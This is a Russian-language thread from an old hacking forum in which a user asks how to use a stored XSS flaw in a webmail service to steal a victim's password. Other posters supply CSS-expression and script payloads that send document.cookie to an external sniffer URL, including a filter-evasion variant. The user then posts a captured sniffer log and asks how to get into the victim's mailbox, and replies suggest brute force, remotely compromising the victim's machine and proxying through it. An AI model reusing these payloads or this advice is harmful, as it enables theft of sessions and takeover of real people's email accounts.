Форум АНТИЧАТ - ПОМОГИТЕ СРОЧНА ПЛЗ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - ПОМОГИТЕ СРОЧНА ПЛЗ (https://forum.antichat.xyz/showthread.php?t=10056)

anti_sec2

14.10.2005 14:07

ПОМОГИТЕ СРОЧНА ПЛЗ

привет если я отправил на одно мыло с :
<hr style=top:expression(alert(19))>
<span style=top:expression(alert(20))></span>

и он выдал алерт 19 и 20
тепер как мона использоват эти щтучки чтоб пасс писался на antichat.ru/sniff/log
что я должен написат в писме?
прощу поясней
ЗАРАНЕЕ БЛОГОДАРЕН

censored!

14.10.2005 15:10

вместо alert(19) или alert(20) тогда это:

Цитата:

img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;

или так

Цитата:

Если не прокатит, попробуй пробелы заменить на комментарий:
<script>img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

anti_sec2

14.10.2005 15:24

Цитата:

Сообщение от censored!

вместо alert(19) или alert(20) тогда это:

или так

Если не прокатит, попробуй пробелы заменить на комментарий:
<script>img=new/**/Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

СПАСИБО !!!!

bul666

14.10.2005 16:11

РАБОТАЕТ ТОЛЬКО В Ie!!!

Kond4r

14.10.2005 16:13

Цитата:

Сообщение от bul666

РАБОТАЕТ ТОЛЬКО В Ie!!!

bul666

14.10.2005 16:20

Цитата:

Сообщение от Kond4r

ЧЕ??! Я имею ввиду, что:

Цитата:

Работает только в IE...

Kond4r

14.10.2005 16:22

С этим не поспоришь))))

anti_sec2

14.10.2005 18:14

Цитата:

Сообщение от censored!

НЕСРАБОТАЛ!!!!!!!!

1) <hr style=top:expression(img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;)>

2)<hr style=top:expression(<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>)>

один невидим но логи не приходят!!!
а другой виден значет не работает!!

Майор

14.10.2005 20:09

так работает :

Код HTML:

anti_sec2

14.10.2005 22:00

Цитата:

Сообщение от Майор

так работает :

Код HTML:

спасибо !!! проверим

Dronga

14.10.2005 23:35

Цитата:

Сразу видно человек пользовался прогой XSS Tester от LittleLamer =) Дельная прога, очень хотелось бы увидеть новую версию с новыми конструкциями xss вставок. А если человек о ней узнал, то это означает что он прочитал Небольшой faq Майора. Дедукция .. =)

anti_sec2

16.10.2005 16:13

авот что мне пришло я что то тут не вижу хеш пароля что мне делать?как мне зайти на почту жертвы

Date: [Sat|15/10/2005|18:02] || IP: 85.132.6.xxx Real IP(if use proxy):()
QUERY:
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
REFERER:http://mail.rambler.ru/Session/50686...=INBOX&MSG=111

Dronga

16.10.2005 16:27

Не уверен, но по-моему на сегодняшний день способов взлома rambler.ru нету. Куки для авторизации данный сервис не использует, сессия строго привязывается к ip-адресу. Что остаётся? Брут. Я не пробовал данный сервис на брутабельность.

Вот если включить фантазию, то получается что у тебя есть ip жертвы... Значит если у него бажная ОС, то в теории можно управлять клмпом удаленно.. Если это получается, то надо ставить на машину жертвы прокси-сервер и лезть с отснифанной сессией и его айпишником.. Тока если так =) Далее начинается Unreal Tournament...

Dronga

16.10.2005 17:16

Так... Что-то я кинулся рамблер смотреть... Xss не проходит.. Куки для аутентификации всё-таки используются. Привязку к айпи проверить не получилось. А какую Xss используете?

Время: 20:27